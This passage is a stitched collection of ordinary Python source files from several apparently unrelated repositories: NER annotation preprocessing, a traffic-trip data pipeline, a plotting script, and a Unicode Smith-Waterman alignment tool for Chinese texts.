print("Line is None")
continue
file_name=fn.split("/")[-1][0:-4]
ofn = output_directory+file_name+"_" +options.outsuffix.replace(".","")+"_"+phase_name.replace("/","")+".txt"
with open(ofn, 'wt') as of:
of.write(''.join(lines))
TEXTBOUND_LINE_RE = re.compile(r'^T\d+\t')
Textbound = namedtuple('Textbound', 'start end type text')
def parse_textbounds(f):
"""Parse textbound annotations in input, returning a list of Textbound."""
textbounds = []
for l in f:
l = l.rstrip('\n')
if not TEXTBOUND_LINE_RE.search(l):
continue
id_, type_offsets, text = l.split('\t')
type_, start, end = type_offsets.split()
start, end = int(start), int(end)
textbounds.append(Textbound(start, end, type_, text))
return textbounds
def eliminate_overlaps(textbounds):
eliminate = {}
# TODO: avoid O(n^2) overlap check
for t1 in textbounds:
for t2 in textbounds:
if t1 is t2:
continue
if t2.start >= t1.end or t2.end <= t1.start:
continue
# eliminate shorter
if t1.end - t1.start > t2.end - t2.start:
print("Eliminate %s due to overlap with %s" % (
t2, t1), file=sys.stderr)
eliminate[t2] = True
else:
print("Eliminate %s due to overlap with %s" % (
t1, t2), file=sys.stderr)
eliminate[t1] = True
return [t for t in textbounds if t not in eliminate]
def get_annotations(fn):
global options
annfn = path.splitext(fn)[0] + options.annsuffix
with open(annfn, 'rU') as f:
textbounds = parse_textbounds(f)
textbounds = eliminate_overlaps(textbounds)
return textbounds
def Read_Main_Input_Folder(input_folder):
start_dir = input_folder
pattern = "*.txt"
file_location_list=[]
for dir,_,_ in os.walk(start_dir):
file_location_list.extend(glob(os.path.join(dir,pattern)))
return file_location_list
def process_folder(source_folder, output_dir_ann, min_folder_number = 1, max_folder_number=10 ):
# for i in range(min_folder_number,max_folder_number+1):
# for j in range(1,6):
# phase_name="phase_"+str(i).zfill(2) + "_"+str(j).zfill(2)+"/"
input_folder=source_folder
print(input_folder)
list_of_files=Read_Main_Input_Folder(input_folder)
process_files(list_of_files, output_dir_ann)
def convert_standoff_to_conll(source_directory_ann, output_directory_conll):
global options
argv = sys.argv
options = argparser().parse_args(argv[1:])
# print(options)
# sorce_folder = "checked_annotation/"
# phase_name="phase_02_05/"
# input_folder=sorce_folder+phase_name
# list_of_files=Read_Main_Input_Folder(input_folder)
# output_dir_ann = "Conlll_Output_ANN/"
# process_files(list_of_files, output_dir_ann, phase_name)
process_folder(source_directory_ann, output_directory_conll)
# sorce_folder = "raw_data/"
# output_dir_raw = "Conlll_Output_RAW/"
# sorce_folder = "raw_data/"
# phase_name="phase_02_05/"
# input_folder=sorce_folder+phase_name
# list_of_files=Read_Main_Input_Folder(input_folder)
# output_dir_ann = "Conlll_Output_RAW/"
# process_files(list_of_files, output_dir_ann, phase_name)
if __name__ == '__main__':
source_directory_ann = "../temp_files/standoff_files/"
output_directory_conll = "../temp_files/conll_files/"
convert_standoff_to_conll(source_directory_ann, output_directory_conll)
```
#### File: BERT_NER/utils_preprocess/fix_char_encoding.py
```python
import ftfy
import stokenizer
import ark_twokenize
class Fix_Char_Code:
"""docstring for Fix_Char_Code"""
def __init__(self):
pass
def Get_List_of_Labels(self, tokenized_word_list_len, main_label):
if main_label=="O":
new_label="O"
elif main_label[0]=="B":
new_label=main_label.replace("B-","I-")
else:
new_label= main_label
new_label_list=[main_label]
for i in range(tokenized_word_list_len-1):
new_label_list.append(new_label)
# print(tokenized_word_list_len, main_label, new_label_list)
return new_label_list
def Fix_Word_Label(self, word, gold_label, raw_label):
if "&zwnj" in word or " " in word or "&" in word:
return ([word], [gold_label], [raw_label], False)
fixed_word = ftfy.fix_text(word)
#the following line is found from error analysis over the fixed encoding by finding && in the text file
fixed_word=fixed_word.replace("´","'").replace("ÂŁ","£").replace('Ăż','ÿ').replace('Âż','¿').replace('ÂŹ','¬').replace('รก','á').replace("â","†").replace("`ĚN","`̀N")
modified=True
if fixed_word==word:
modified = False
return ([fixed_word], [gold_label], [raw_label], modified)
try:
fixed_word_tokenized= stokenizer.tokenize(fixed_word)
except stokenizer.TimedOutExc as e:
try:
fixed_word_tokenized= ark_twokenize.tokenizeRawTweetText(fixed_word)
except Exception as e:
print(e)
if len(fixed_word_tokenized)==2 and fixed_word_tokenized[0]=="'":
return ([fixed_word], [gold_label], [raw_label],modified)
# print(word, fixed_word, fixed_word_tokenized)
new_gold_label_list = self.Get_List_of_Labels(len(fixed_word_tokenized), gold_label)
new_raw_label_list = self.Get_List_of_Labels(len(fixed_word_tokenized), raw_label)
return (fixed_word_tokenized, new_gold_label_list, new_raw_label_list,modified)
def Read_File(self, ip_file):
output_file_name = ip_file[:-4]+"_char_embed_resolved.txt"
fout= open(output_file_name,'w')
for line in open(ip_file):
if line.strip()=="":
fout.write(line)
continue
line_values=line.strip().split()
gold_word=line_values[0]
gold_label=line_values[1]
raw_word=line_values[2]
raw_label=line_values[3]
(new_tokenized_word_list, new_gold_label_list, new_raw_label_list, if_modified) = self.Fix_Word_Label(gold_word, gold_label, raw_label)
if if_modified:
print(line.strip())
print(new_tokenized_word_list)
print("----")
# print(new_tokenized_word_list, new_gold_label_list, new_raw_label_list)
for word_iter in range(len(new_tokenized_word_list)):
word = new_tokenized_word_list[word_iter]
if word.strip()=="":
continue
gold_label = new_gold_label_list[word_iter]
if word == "'s":
gold_label="O"
raw_label = new_raw_label_list[word_iter]
op_line = word+"\t"+gold_label+"\t"+word+"\t"+raw_label+"\n"
# print(op_line)
fout.write(op_line)
if __name__ == '__main__':
fcc = Fix_Char_Code()
ip_file_name = "test_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
ip_file_name = "train_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
ip_file_name = "dev_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
```
|
{
"source": "jenizar/traffic-cruising-DSSG2017",
"score": 3
}
|
#### File: traffic-cruising-DSSG2017/pipeline/combine_days.py
```python
import rethinkdb as r
def combine_days(db_name, silent=True):
'''Combines days of data into one JSON list.
db_name [str]: a RethinkDB database name
Reads all tables in the given database into memory
and returns them as a list of dicts.'''
indiv_days = r.db(db_name).table_list().run()
if len(indiv_days) > 7:
raise(Exception('Database contains more than 7 days of data:\n' \
+ str(indiv_days) + '\n\nDelete days by connecting to ' \
+ 'RethinkDB from python (and running `r.table_drop(<tablen' \
+ 'ame>).run()`, without backticks. See docs for more info.'))
if len(indiv_days) == 0:
raise(Exception("Database contains no tables. Either you're" \
+ "connected to the wrong database, the pipeline hasn't" \
+ "been run yet, or the pipeline is broken."))
if silent == False:
print('Combining ' + str(len(indiv_days)) + ' days of trips.')
combined = []
for i in range(len(indiv_days)):
if silent == False:
print('Appending day ' + str(i + 1) + ' of ' \
+ str(len(indiv_days)) + '.')
temp = list(r.db(db_name).table(indiv_days[i]).run())
combined.extend(temp)
return combined
```
#### File: traffic-cruising-DSSG2017/pipeline/label_modes.py
```python
def label_modes(trip_list, silent=True):
"""Labels trip segments by likely mode of travel.
Labels are "chilling" if traveler is stationary, "walking" if slow,
"driving" if fast, and "bogus" if too fast to be real.
trip_list [list]: a list of dicts in JSON format.
silent [bool]: if True, does not print reports.
Returns list of dicts in JSON format."""
if silent == False:
print('Preparing to label modes of travel for ' \
+ str(len(trip_list)) + ' trips.')
loop_counter = 0
loop_size = len(trip_list)
for doc in trip_list:
if silent == False:
loop_counter = loop_counter + 1
if loop_counter % 10000 == 0:
print('Labeling modes. Finished ' + str(loop_counter) \
+ ' trips.')
time_spent_driving = 0
time_spent_walking = 0
time_spent_chilling = 0
time_spent_bogus = 0
for i in range(1,len(doc['reduction'])):
if (float(doc['reduction'][i]['velocity']) >= 2.3):
doc['reduction'][i]['mode'] = 'driving'
elif (float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0):
doc['reduction'][i]['mode'] = 'walking'
elif (float(doc['reduction'][i]['velocity']) == 0.0):
doc['reduction'][i]['mode'] = 'chilling'
if (float(doc['reduction'][i]['velocity']) > 22.22):
doc['reduction'][i]['mode'] = 'bogus'
for i in range(1,len(doc['reduction']) - 1):
path_length = 0
if (doc['reduction'][i]['mode'] == 'driving'):
for j in range(i+1,len(doc['reduction'])):
last_intersection_id = doc['reduction'][j]['IntersectionID']
if (doc['reduction'][j]['mode'] == 'walking'): path_length = path_length + 1
elif (doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus'): break
if (path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']):
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'walking'
else :
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'driving'
if (doc['reduction'][i]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
if (doc['reduction'][-1]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
duration_of_trip = float(doc['duration_of_trip'])
doc['time_percentage_driving'] = str(time_spent_driving/duration_of_trip*100)
doc['time_percentage_walking'] = str(time_spent_walking/duration_of_trip*100)
doc['time_percentage_chilling'] = str(time_spent_chilling/duration_of_trip*100)
doc['time_percentage_bogus'] = str(time_spent_bogus/duration_of_trip*100)
if silent == False:
print('Done labeling mode of travel. Returning list of length ' \
+ str(len(trip_list)) + '.')
return trip_list
```
#### File: traffic-cruising-DSSG2017/pipeline/segment_stops.py
```python
import numpy as np
import itertools as itt
def segment_stops(trip_list, stop_dur=10, append_tag=True, retain_stops=True,
silent=True):
"""Splits trips if there are sufficiently large stops, returns new table name.
trip_list [list]: a list of dicts in JSON format.
stop_dur [int]: duration of stops (in minutes) that will be used
to split trips.
append_tag [bool]: should trips that get split have tags
(_S0, _S1, _S2, etc.) appended to their hashes?
retain_stops [bool]: if True, all mid-stop reads will be included with the
segments before and after the stop
silent [bool]: if True, does not print reports.
You'll want to rerun filter_short_trips after using this function.
Does not work on routed data.
Returns list of dicts in JSON format."""
if silent == False:
print('Segmenting trips before and after stops > ' \
+ str(stop_dur) + ' minutes. Processing '+ str(len(trip_list)) \
+ ' trips.')
#find hashes with multiple trips and identify where to split them
splits = []
for j in range(len(trip_list)):
#sort reduction by time (just to be on the safe side)
reduc = trip_list[j]['reduction']
l = range(len(reduc))
time_order = np.argsort([reduc[i]['time'] for i in l])
rreduc = [reduc[i] for i in time_order]
#get times and intersection IDs associated with sensor reads
times = [rreduc[i]['time'] for i in l]
hit_ids = [rreduc[i]['IntersectionID'] for i in l] #get list of intersections
#identify stops that are >= stop_dur minutes (big stops)
hits_per_sensor = [sum(1 for _ in gp) for x, gp in itt.groupby(hit_ids)] #get run lengths
repeat_sensors = [ind for ind, item in enumerate(hits_per_sensor) if item > 1] #which run lengths > 1?
cs = np.cumsum(hits_per_sensor) #used to find stop endpoints
rep_end_inds = [cs[i]-1 for i in repeat_sensors] #indices of final times for sensors with repeats
hits_per_repeat = [hits_per_sensor[i] for i in repeat_sensors]
rep_start_inds = list(map(lambda x, y : x - y + 1, rep_end_inds, hits_per_repeat))
rep_durs = [int(times[rep_end_inds[i]]) - int(times[rep_start_inds[i]]) for i in range(len(rep_end_inds))]
big_stops = [ind for ind, item in enumerate(rep_durs) if item >= stop_dur*60]
#find the temporal endpoints of big stops, and the location
stop_bounds = [(times[rep_start_inds[i]], times[rep_end_inds[i]],
hit_ids[i]) for i in big_stops]
#if there are any, add the whole doc to new list, along with segment bounds
if len(stop_bounds):
splits.append([trip_list[j], stop_bounds])
if silent == False:
print('Found ' + str(len(splits)) \
+ ' trips that need to be segmented.')
#for each trip that needs to be split, create a list of integer categories
#representing which reads will be allocated to each new segment
break_schemes = [None] * len(splits) #create a list to hold lists of segment #s
for i in range(len(splits)): #for each trip that needs to be split
reads = splits[i][0]['reduction'] #get the reads
break_schemes[i] = np.repeat(0, len(reads)) #assign all reads 0
for j in range(len(splits[i][1])): #for each time the trip needs to be segmented
stop_beginning = int(splits[i][1][j][0]) #get the moment they stopped
stop_end = int(splits[i][1][j][1]) #and the moment they started moving again
for k in range(len(reads)): #for each read
read_time = int(reads[k]['time'])
if read_time > stop_beginning and read_time < stop_end: #does the read take place mid-stop?
break_schemes[i][k] = -j - 1 #then mark it as a negative segment number
elif read_time >= stop_end: #does it follow the stop?
break_schemes[i][k] = j + 1 #then assign it a positive segment number
if silent == False:
print('Determined splitting scheme.')
#now do the actual splitting
segs = []
for i in range(len(break_schemes)): #for all trips that need to be split
scheme = list(map(int, break_schemes[i])) #convert scheme to int
hsh = splits[i][0]['group'] #get the original hash
moving_segs = set([abs(scheme[i]) for i in range(len(scheme))])
for j in moving_segs: #for each new trip...
if retain_stops == True: #if you want to keep reads taken during stops...
jj = (j, -j, -(j+1)) #include the trip and the full stop on either side
seg = [splits[i][0]['reduction'][k] for k in range(len(scheme)) if scheme[k] in jj]
else: #otherwise keep the trip and the stop boundaries on either side
seg = [splits[i][0]['reduction'][k] for k in range(len(scheme)) if scheme[k] == j]
if append_tag == True: #label each new trip with a unique tag if desired
newhash = hsh + '_S' + str(j)
segs.append({'group':newhash,'reduction':seg})
elif append_tag == False:
segs.append({'group':hsh,'reduction':seg})
else:
raise ValueError("arg 'append_tag' must be logical")
#filter segmented trip_list from list
ids = set([splits[i][0]['id'] for i in range(len(splits))])
preseg_removed = [trip_list[i] for i in range(len(trip_list)) if trip_list[i]['id'] not in ids]
#append segmented trip_list to list and upload to the new table
out = preseg_removed + segs
# r.table(table_name).insert(out).run()
# cursor.close() #see todo list
# return table_name
if silent == False:
print('Done with stop segmentation. Returning list of length ' \
+ str(len(out)) + '. Now use filter_short_trips.')
return out
```
|
{
"source": "jenjoit/ML_Pipeline_Template",
"score": 3
}
|
#### File: src/visualization/exploratory.py
```python
import click
import matplotlib
matplotlib.use('agg')
import seaborn as sns
import sys
sys.path.append('src')
from data import read_processed_data
def exploratory_visualization(dframe):
return sns.pairplot(dframe, diag_kind='kde', vars=['x0', 'x1', 'x2', 'x3'], hue='y')
@click.command()
@click.argument('input_file', type=click.Path(exists=True, dir_okay=False))
@click.argument('output_file', type=click.Path(writable=True, dir_okay=False))
def main(input_file, output_file):
print('Plotting pairwise distribution...')
dframe = read_processed_data(input_file)
plot = exploratory_visualization(dframe)
plot.savefig(output_file)
if __name__ == '__main__':
main()
```
|
{
"source": "jenjouhung/multple_align_ssw",
"score": 2
}
|
#### File: jenjouhung/multple_align_ssw/mytest.py
```python
import datetime
from src import *
import sys,getopt
import os
def align_init(allSymbols,variantTable=None):
if variantTable:
#設定使用 UnicodeTextScoreMatrix
# 帶入異體字表
mUTSM=UnicodeTextScoreMatrix(alphabet=allSymbols,variantTable=variantTable)
else:
#設定使用 UnicodeTextScoreMatrix
mUTSM=UnicodeTextScoreMatrix(alphabet=allSymbols)
# 初始化比對物件,帶入UnicodeTextScoreMatrix
# 尚待處理:加入分數門檻。
alignerObject = Aligner(matrix=mUTSM)
return alignerObject
def align(
refID,refString,qryID,qryString,
msgType = 2, # 可能值為 1: 正式輸出, 2: Debug 輸出
quickMode = False, # Joey Quick Mode
minLen=10, #欲比對/顯示之字串低於此門檻,便停止
distinctChars=None, #預輸入的不重複字 (optional)
variantTable=None, # 異體字比對表,有傳值進來就會啟動異體字比對 (optional)
multipleAlignment=False #是否要進行多次比對
):
#輸出訊息用
num_turns=0
compareTaskQueue=[] #用來存放比較工作的Queue
msg =[] #累計Report
t0 = datetime.datetime.now()
#不重複字元清單
dcs = distinctChars if distinctChars else "".join(set(list(refString)+list(qryString)))
# if distinctChars:
# dcs=distinctChars
# else:
# dcs="".join(set(list(refString)+list(qryString)))
#處始化比對器
aligner = align_init(dcs,variantTable)
#比較句長於MIN_COMP_LENGTH,放入比較範圍Queue
if (len(refString)>=minLen and len(qryString)>=minLen):
compareTaskQueue=[(0,len(refString),0,len(qryString))]
while(len(compareTaskQueue)>0):
num_turns+=1 #迴圈記數
#由Queue中,取出比較範圍
# crBegin 可理解為 compare_ref_begin
# cqBegin 可理解為 compare_qry_begin
comInterval=compareTaskQueue.pop()
crBegin,crEnd,cqBegin,cqEnd=comInterval
#找出本次比較字串
crString=refString[crBegin:crEnd]
cqString=qryString[cqBegin:cqEnd]
# t2 = datetime.datetime.now()
#進行比對,不進行反向比對 (dna 比對專用)
alignment = aligner.align(reference=crString, query=cqString,qMode=quickMode,revcomp=False)
# t3 = datetime.datetime.now()
#print ("第{}次比對,花費:{:.7f} 秒".format(num_turns,(t3 - t2).microseconds*0.000001))
#取得分數與長度
arScore=alignment.score
arLen=alignment.reference_end-alignment.reference_begin
aqLen=alignment.query_end-alignment.query_begin
#比對成果大於需求,表示有找到有效區段
if ((arLen >=minLen) and (aqLen >=minLen)):
msg=alignReport(alignment,refID,crString,qryID,cqString,comInterval,msgType,nturn=num_turns)
#若 multipleAlignment == True 則進行切割與加入Queue
#這部份考慮要廢掉了
# 2020/03/09 先封存
# if (multipleAlignment):
# if ((arBegin-crBegin)>=minLen and (aqBegin-cqBegin)>=minLen):
# compareTaskQueue.append((crBegin,arBegin,cqBegin,aqBegin))
# if ((cqEnd-aqEnd)>=minLen and (crEnd-arEnd)>=minLen):
# compareTaskQueue.append((arEnd,crEnd,aqEnd,cqEnd))
return msg
def alignReport(alignment, refID,crString,qryID,cqString,compareInterval,
msgType=2,nturn=-1):
# msgType = 1, 正式輸出訊息
# msgType = 2, Debug 訊息
# msgType = 3, 原程式Report
crBegin,crEnd,cqBegin,cqEnd=compareInterval
arBegin=alignment.reference_begin+crBegin
arEnd=alignment.reference_end+crBegin
#aqBegin 可理解為 align_qry_begin
aqBegin=alignment.query_begin+cqBegin
aqEnd=alignment.query_end+cqBegin
# arBegin2=alignment.reference_begin2+crBegin
# aqBegin2=alignment.query_begin2+cqBegin
arScore=alignment.score
# arLen=alignment.reference_end-alignment.reference_begin
# aqLen=alignment.query_end-alignment.query_begin
msg =[]
# class Alignment(object):
# def __init__ (self, alignment, query, reference, matrix=None):
#sid1,sid2,score,align1,align2,s1_start,s1_end,s2_start,s2_end
#P1618_001_0007,T1799_001_0034,38,眾生---生死相續皆由不知常住真心,眾生無始生-死相續皆由不知常住真心,23,36,2,17
if (msgType ==1): #判斷 1 的bit 是否有set
m=alignment.alignment
r = [refID,qryID,arScore,m[0].replace("〇","-"),m[2].replace("〇","-"),crBegin,crEnd,cqBegin,cqEnd]
s="\t".join(str(d) for d in r)
msg.append(s)
elif (msgType==2): #判斷 2 的bit 是否有set
msg.append("======== My Report #{} ========== ".format(nturn))
msg.append("比對對象:Ref[{}:{}] (ID:{}):: Query[{}:{}] (ID:{}) ".format(crBegin,crEnd,refID,cqBegin,cqEnd,qryID))
msg.append("[原]最佳比對位置:Ref[{}:{}] :: Query[{}:{}] ".format(arBegin,arEnd,aqBegin,aqEnd))
# msg.append("最佳比對位置:Ref[{}:{}] :: Query[{}:{}] ".format(arBegin2,arEnd,aqBegin2,aqEnd))
# if not (arBegin ==arBegin2) or not (aqBegin ==aqBegin2):
# print("[mismatch] 出發點不同!!")
msg.append("結果:score={}, 比對句:".format(arScore))
# msg.append("結果2:n_score={}, 比對句:".format(alignment.n_score))
# msg.append("------ original align message -----")
msg+=alignment.alignment
# msg.append("------ new align message -----")
# msg+=alignment.alignment_n
# msg.append(" "*4+"Ref [{}:{}]({}) {}".format(arBegin,arEnd,arLen,refString[arBegin:arEnd]))
# msg.append(" "*4+"Qry [{}:{}]({}) {}".format(aqBegin,aqEnd,aqLen,qryString[aqBegin:aqEnd]))
elif (msgType==3):
r=alignment.alignment_report()
#r=alignment.alignment
msg.append(r)
return msg
def usage():
print("usage: mytest.py [-o output FILE ] [-dpqv] FILE1 [FILE2] ")
# main function starts here:
FILE_PATH=os.path.dirname(__file__)
#重要的流程控制參數,與外來參數有關
OUTPUT_filename=None
inputFormat="fullText" # 選項為:fullText 與 sentencePair
variantMode = False # Ture/False 控制是否進行異體字比對
variantFileLocation =os.path.join(FILE_PATH,"data","variants.txt")
mssageType=1 # 1: 正式輸出, 2: Debug輸出 (可由command line 加上-d 來控制)
qMode=False # Joey 加速Mode
try:
opts, args = getopt.getopt(sys.argv[1:], "dqpvo:")
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
#抓取 -o 的選項與值
for opt,value in opts:
if "-o" in opt:
OUTPUT_filename = value
if "-p" in opt:
inputFormat = "sentencePair"
if "-v" in opt:
variantMode = True
if "-d" in opt:
mssageType=2
if "-q" in opt:
qMode = True # Joey 加速Mode
#一般讀檔,需要兩個檔
#測試始否給定 FILE1 與 FILE2
if (inputFormat=="fullText" and len(args) !=2) :
print ("Please specify FILE1 and FILE2 for comparsion.")
usage()
sys.exit(2)
elif (inputFormat=="sentencePair" and len(args) !=1) :
print ("Please specify Sentence Pair FILE for comparsion.")
usage()
sys.exit(2)
compareStringArray=[] #紀錄用來比較的Array
if (OUTPUT_filename): print("開始執行比對:")
if inputFormat == "fullText":
#開檔, reference & query
# 2020/03/09 輸入格式改為:id \tab text
with open(args[0],'r') as ifile1, open(args[1],'r') as ifile2:
print("資料模式:兩全文檔比對")
print("Reading Files:{},{}".format(args[0],args[1]))
ref=ifile1.read().strip().split("\t")
qry=ifile2.read().strip().split("\t")
compareStringArray.append((ref[0],ref[1],qry[0],qry[1]))
elif inputFormat == "sentencePair":
# 2020/03/09 輸入格式改為:id1 \tab text1 \tab id2 \tab text2
#開檔,依序讀入需要分割的字串
print("Reading File:{}".format(args[0]))
print("資料模式:Sentence Pair")
with open(args[0],'r') as ifile1:
for s in ifile1:
compareStringArray.append(tuple(s.strip().split("\t")))
vt=None
if variantMode:
vt=VariantTable(variantCSVFile=variantFileLocation)
print("異體字比對:On")
vt=None
if variantMode:
vt=VariantTable(variantCSVFile=variantFileLocation)
loop=0
t0 = datetime.datetime.now()
alignMessges=[]
task_length=len(compareStringArray)
while (len(compareStringArray)):
if (loop%1000)==0:
tnow = datetime.datetime.now()
tms=(tnow-t0).microseconds
progress = loop/task_length*100
speed = (tms)/(loop+1)
expTime = speed*(task_length-loop)*0.000001
#print("\r開始比對... {:.0f}% ({:.2f} ms/pair) (剩餘時間:{:.2} sec)".format(progress,speed,expTime),end="",flush=True)
if (OUTPUT_filename): print("\r開始比對... {:.0f}% ".format(progress),end="",flush=True)
refID,refString,qryID,qryString = compareStringArray.pop()
loop+=1
#print("{},".format(loop),end="")
# endtime = datetime.datetime.now()
# print ("執行完成,花費:{:.6f} 秒".format((endtime-starttime).microseconds*0.000001))
rMsg = align(refID,refString,qryID,qryString,mssageType,quickMode=qMode,variantTable=vt)
alignMessges.extend(rMsg)
if (not OUTPUT_filename):
for m in rMsg:
print(m)
t1= datetime.datetime.now()
print ("")
print ("執行完成,花費:{} 秒".format((t1-t0).seconds))
#取得內建 report 字串
# r=alignment.alignment_report()
# #先用簡單作法,讓字元能夠正確對應,之後會修正
# r=r.replace("|","|").replace("*","*").replace("-","〇")
if (OUTPUT_filename):
print ("結果輸出於:{}".format(OUTPUT_filename))
with open(OUTPUT_filename,'w') as ofile:
ofile.write("\r\n".join(alignMessges))
```
#### File: multple_align_ssw/src/iupac.py
```python
import six
from six.moves import range
__all__ = (
"NucleotideTable",
"NucleotideAlphabet",
"NucleotideComplementTable",
"nucleotide_reverse_complement",
)
def _build_compliment_table():
_ctable = list(map(chr, range(0xff + 1)))
for symbol in NucleotideAlphabet:
complement = NucleotideTable[symbol]["complement"]
_ctable[ord(symbol)] = complement
_ctable[ord(symbol.lower())] = complement.lower()
return str.join('', _ctable)
def _iupac_info(complement, matches):
return {
"complement": complement.upper(),
"matches": tuple(matches.upper())
}
NucleotideTable = {
'A': _iupac_info('T', 'A'),
'G': _iupac_info('C', 'G'),
'C': _iupac_info('G', 'C'),
'T': _iupac_info('A', 'T'),
'U': _iupac_info('A', 'T'),
'M': _iupac_info('K', 'AC'),
'R': _iupac_info('Y', 'AG'),
'Y': _iupac_info('R', 'CT'),
'S': _iupac_info('S', 'CG'),
'W': _iupac_info('W', 'AT'),
'K': _iupac_info('M', 'GT'),
'B': _iupac_info('V', 'CGT'),
'D': _iupac_info('H', 'AGT'),
'H': _iupac_info('D', 'ACT'),
'V': _iupac_info('B', 'ACG'),
'N': _iupac_info('N', 'AGCT')
}
NucleotideAlphabet = str.join('', tuple(NucleotideTable.keys()))
NucleotideComplimentTable = _build_compliment_table()
def nucleotide_reverse_complement(sequence):
return sequence[::-1].translate(NucleotideComplimentTable)
```
|
{
"source": "jenjouhung/ssw",
"score": 2
}
|
#### File: jenjouhung/ssw/unissw_dila.py
```python
from unissw import *
from pathlib import Path
import sys
import getopt
import os
import json
from multiprocessing import Pool
class TaskObj():
def __init__(self, config, messageType, variantMode, variantFile, task, logLevel=3):
self.config = config
self.logLevel = logLevel
self.messageType = messageType
self.variantMode = variantMode
self.variantFile = variantFile
self.task = task
def usage():
print("usage: python3 unissw_dila.py [-c config FILE] -t task FILE")
def resolveSentRange(segsDict, idRange):
"""
segsDict 區段字典, key:text
idRange id 區段,可能為x 或 x..y ex: (10 or 11..13)
"""
"""
"""
if (".." in idRange):
s, e = idRange.split("..")
r = ""
# print ("------")
# print("[{}]{}".format(s,segsDict[s]))
# print("[{}]{}".format(e,segsDict[e]))
# 考慮到最後一段才可能不滿...
r = segsDict[e] # 最後拿滿
for n in range(int(e)-1, int(s)-1, -1):
# print("n="+str(n))
L = len(segsDict[str(n)])/2
# print("Length={}".format(L))
r = segsDict[str(n)][:int(L)]+r # 其他拿前半
return r
else:
# print ("------")
# print("[{}]{}".format(idRange,segsDict[idRange]))
return segsDict[idRange]
def check_sent_file(fn):
i = 0
with open(fn, 'r') as file:
for line in file:
i += 1
a = line.strip().split("\t")
if len(a) < 2:
print(f"讀取 sent 檔案發生錯誤: {fn}")
print(f"行號: {i}")
print(f"line text: {line}")
def process_task_record(tr, config, logLevel=3):
r = []
output_file = None
logMessages = []
# 檢查 file_base 設定
file_base = os.path.dirname(__file__)
if ("data_folder" in tr):
file_base = tr["data_folder"]
# Task ID 設定
trid = tr["task_id"] if "task_id" in tr else "Unknown"
# 檢查 output_file 設定
if ("output_file" in tr):
output_file = os.path.join(file_base, tr["output_file"])
if logLevel >= 1:
logMessages.append("[#TID:{}][#TaskStart]".format(trid))
# print(logMessages[-1])
# 開始進行各 task record 細節比對
if (tr["data_type"] == "p"): # (P)air Mode, pair 檔案內含比對文字
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Task FILE ERROR: must set pair_file when data_type set to p. \n Occucrs in{}".format(tr))
pair_file = os.path.join(file_base, tr["pair_file"])
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:Sentence Pair".format(trid))
logMessages.append(
"[#TID:{}][#PairFILE]Reading File:{}".format(trid, pair_file))
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
with open(pair_file, 'r') as ifile1:
for s in ifile1:
# 內容格式為:id1 \tab text1 \tab id2 \tab text2
r.append(tuple(s.strip().split("\t")))
# (S)eperate mode: id, sentence 分開檔案儲存
elif (tr["data_type"] == "s" or tr["data_type"] == "sc"):
CCCTH = -1 # common_char_count_th
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Task FILE ERROR: must set pair_file when data_type set to s. \n Occucrs in{}".format(tr))
if not ("sent_file1" in tr):
raise SystemExit(
"Error: 12 Task FILE ERROR: must set sent_file1 when data_type set to s. \n Occucrs in{}".format(tr))
if not ("sent_file2" in tr):
raise SystemExit(
"Error: 13 Task FILE ERROR: must set sent_file2 when data_type set to s. \n Occucrs in{}".format(tr))
if tr["data_type"] == "s":
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:pair, sentence 分離模式".format(trid))
if tr["data_type"] == "sc":
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:pair, sentence 分離模式 (有common character count)".format(trid))
if logLevel >= 3:
print(logMessages[-1])
sent_file1 = os.path.join(file_base, tr["sent_file1"])
sent_file2 = os.path.join(file_base, tr["sent_file2"])
pair_file = os.path.join(file_base, tr["pair_file"])
with open(sent_file1, 'r') as sfile1, open(sent_file2, 'r') as sfile2, open(pair_file, 'r') as pfile:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#SentFILE-1]讀取資料檔:{}".format(trid, sent_file1))
try:
s1 = dict([(line.strip().split("\t")) for line in sfile1])
except:
check_sent_file(sent_file1)
raise
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#SentFILE-2]讀取資料檔:{}".format(trid, sent_file2))
print("[#TID:{}][#SentFILE-2]讀取資料檔:{}".format(trid, sent_file2))
s2 = dict([(line.strip().split("\t")) for line in sfile2])
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
plines = [line.strip().split("\t") for line in pfile]
